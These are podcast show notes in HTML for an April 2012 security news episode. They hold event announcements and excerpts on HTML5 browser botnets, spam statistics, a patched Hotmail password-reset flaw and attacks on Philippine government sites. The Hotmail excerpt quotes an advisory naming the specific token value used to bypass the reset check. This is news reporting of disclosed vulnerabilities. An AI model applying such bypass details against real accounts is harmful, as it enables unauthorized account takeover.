			<content:encoded><![CDATA[<p><b id="internal-source-marker_0.07924103108234704" style="color: rgb(0, 0, 0); font-family: Times; font-size: medium; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">InfoSec Daily Podcast Episode 655 for April 27, 2012. </span><span style="font-size: 16px; font-family: Arial; vertical-align: baseline; white-space: pre-wrap; ">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, and Karthik Rangarajan.</span></b></p>
<p><b id="internal-source-marker_0.07924103108234704" style="color: rgb(0, 0, 0); font-family: Times; font-size: medium; "><br />
	</b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.07924103108234704" style="color: rgb(0, 0, 0); font-family: Times; font-size: medium; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Special Guests: Erin Kennedy, and Nick</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; ">&nbsp;</p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Announcements</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Security 504: Hacker Techniques, Exploits &amp; Infcident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014" style="font-family: Times; font-size: medium; "><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap; "> <br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Social Engineering Training</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 153); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Skydogcon</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.skydogcon.com</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Please consider making your &nbsp;Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">or simply use our QR Code Links.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon:<br />
	</span><img height="135px;" src="https://lh5.googleusercontent.com/YEIHDUGmSTDz8uRjdWnunz6hUdDoCKC0BKCbbwDm2j9f0Mci7rKtMcES3QI5FuMDsLQ-poiINFNdg8rtzGc6hSUal2bixiN8AIxcP1zajONabPqSN4U" width="135px;" /></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon UK:<br />
	</span><img height="138px;" src="https://lh5.googleusercontent.com/pT78mIffoHk-a7VdIycUyOp37Rvu0HFyFoOPNrAA1hnnkRMRHkJaP-XAI7d7DKCRTqOe7s5-vRwWkGV6rK77EBOsOoeIRsP9SYZqThOHj2jKwftaUus" width="138px;" /></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Stories</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2012/04/27/html5/"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.theregister.co.uk/2012/04/27/html5/</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">HTML5 will allow web designers to pull off tricks that were previously only possible with Adobe Flash or convoluted JavaScript. But the technology, already widely supported by web browsers, creates plenty of opportunities for causing mischief.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">During a presentation at the B-Sides Conference in London on Wednesday, Robert McArdle, a senior threat researcher at Trend Micro, outlined how the revamped markup language could be used to launch browser-based botnets and other attacks. The new features in HTML5 &#8211; from WebSockets to cross-origin requests &#8211; could send tremors through the information security battleground and turn the likes of Chrome and Firefox into complete cybercrime toolkits.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Many of the attack scenarios involve using JavaScript to create memory-resident &quot;botnets in a browser&quot;, McArdle </span><a href="http://blog.trendmicro.com/html5-the-ugly"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">warned</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">, which can send spam, launch denial-of-service attacks or worse. And because an attack is browser-based, anything from a Mac OS X machine to an Android smartphone will be able to run the platform-neutral code, utterly simplifying the development of malware.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Creating botnets by luring punters into visiting a malicious web page, as opposed to having them open a booby-trapped file that exploits a security flaw, offers a number of advantages to hackers.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Malicious web documents held in memory are difficult to detect with traditional file-scanning antivirus packages, which seek out bad content stored on disk. JavaScript code is also very easy to obfuscate, so network gateways that look for signatures of malware in packet traffic are trivial to bypass &#8211; and HTTP-based attacks pass easily through most firewalls.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Additional dangers involve social engineering using HTML5&#39;s customisable pop-ups that appear outside the browser to fool users into believing the wording on an alert box. More convincing phishing attacks can be created using the technique, McArdle said.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;The good stuff in HTML5 outweighs the bad,&quot; he added. &quot;We haven&#39;t seen the bad guys doing anything bad with HTML5 but nonetheless it&#39;s good to think ahead and develop defences.&quot;</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://www.spamfighter.com/News-17679-Spam-Volume-in-March-2012-Declines-Only-Slightly.htm"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.spamfighter.com/News-17679-Spam-Volume-in-March-2012-Declines-Only-Slightly.htm</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Kaspersky Lab, which released its March 2012 spam report, shows that spam volumes from the total e-mail reduced 3.5% during March 2012 over the previous month of February 2012.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The new spam study reveals that the twenty greatest sources of junk e-mails continued to be same in March 2012, with the same countries as of February 2012 occupying the foremost 6 positions although South Korea and Vietnam interchanged ranks -the latter coming 4th and the former coming 5h.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Maria Namestnikov, security researcher at Kaspersky Lab explained that the first 3 ranks went to India (12.3%), Indonesia (7.5%) and Brazil (6.7%). While spam rates might&#39;ve declined, the menace continued as severe as before with junk e-mail distributors adopting more-and-more refined techniques of scam, she said. Kaspersky.com published this dated April 19, 2012.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Besides, according to Namestnikov, it was ever-since the Calicos/Hlux network-of-bots&#39; latest version got dismantled that the spam rates declined. During March 2012, Kaspersky Lab in combination with companies namely Dell SecureWorks, CrowdStrike, alongside HoneyNet Project dismantled the Kelihos.B botnet.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The spam study thereafter reveals that the topics most commonly utilized within the spam campaigns all through March 2012 related to Easter, St. Patrick&#39;s Day as also iPad3&#39;s recent launch.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Of the several spam campaigns related to St. Patrick&#39;s Day, security company Kaspersky states that the spammers, for acquiring the notice of e-mail recipients, resort to partner programs that abuse any holiday, celebration or same kind of event. Within the current example, it&#39;s Leprechaun-festooned spam websites, which present counterfeit designer watches.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><a href="https://webmail.secureworks.com/owa/redir.aspx?C=26d7343402194c82818833c81b6eb9ac&amp;URL=http%3a%2f%2fwww.zdnet.com%2fblog%2fbott%2freport-says-hotmail-exploit-spread-like-wild-fire-is-now-fixed%2f4892"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.zdnet.com/blog/bott/report-says-hotmail-exploit-spread-like-wild-fire-is-now-fixed/4892</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Microsoft plugged a serious security hole in its Hotmail password reset service last week, after one report claims it was widely exploited.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">April 26, 3:00PM PDT: Microsoft confims existence of flaw and fix. See update at end of post.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Microsoft has deployed a fix for a Hotmail password reset vulnerability that was reportedly being exploited in the wild for days.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A report published </span><a href="http://www.vulnerability-lab.com/get_content.php?id=529"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">today at Vulnerability-Lab</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> described the vulnerability and provided a timeline for its disclosure and fix.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The bulletin rated the severity as &ldquo;Critical,&rdquo; based on this description:</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; font-style: italic; vertical-align: baseline; white-space: pre-wrap; ">A critical vulnerability was found in the password reset functionality of Microsoft&rsquo;s official MSN Hotmail service. The vulnerability allows an attacker to reset the Hotmail/MSN password with attacker chosen values. Remote attackers can bypass the password recovery service to setup a new password and bypass in place protections (token based). The token protection only checks if a value is empty then blocks or closes the web session. A remote attacker can, for example bypass the token protection with values &ldquo;+++)-&ldquo;. Successful exploitation results in unauthorized MSN or Hotmail account access. An attacker can decode CAPTCHA &amp; send automated values over the MSN Hotmail module.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The bulletin says Microsoft fixed the vulnerability on April 20, 2012. The more detailed timeline puts the Vendor Fix/Patch date one day later:</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Report-Timeline:</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">================</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">2012-04-06:<span class="Apple-tab-span" style="white-space: pre; "> </span>Researcher Notification &amp; Coordination</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">2012-04-20:<span class="Apple-tab-span" style="white-space: pre; "> </span>Vendor Notification by VoIP Conference</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">2012-04-20:<span class="Apple-tab-span" style="white-space: pre; "> </span>Vendor Response/Feedback</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">2012-04-21:<span class="Apple-tab-span" style="white-space: pre; "> </span>Vendor Fix/Patch</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">2012-04-26:<span class="Apple-tab-span" style="white-space: pre; "> </span>Public or Non-Public Disclosure</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">During at least part of that two-week gap, the vulnerability was widely exploited, one source says.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://news.yahoo.com/hackers-hit-philippines-websites-amid-china-dispute-193846510.html"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://news.yahoo.com/hackers-hit-philippines-websites-amid-china-dispute-193846510.html</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Philippine government websites are under heavy attack from hackers, apparently from China, amid a tense territorial dispute between the two countries in the South China Sea, officials said Thursday.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">While some Philippine hackers have reportedly launched retaliatory attacks, the government appealed to them for restraint, said Roy Espiritu, spokesman of the government&#39;s information technology office.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;We&#39;ve actually detected several attacks, including attempts at distributed denial of service,&quot; he said, in which a hacker infiltrates computers with which to attack a single target, such as a website, forcing it to shut down.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;They (hackers) are probing into different (Philippine) government domains so we can&#39;t say how many attacks there are. But it is a lot,&quot; Espiritu told AFP.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;The signatures (of the hackers) indicate they are from Chinese networks.&quot;</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Espiritu conceded this could be a ruse and the attacks may have actually originated from other sources.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">But he said all the attacks came after Philippine ships faced off with Chinese patrol vessels in April 8 in the disputed Scarborough Shoal in the South China Sea. Before that, there had been no such attacks.</span></p>
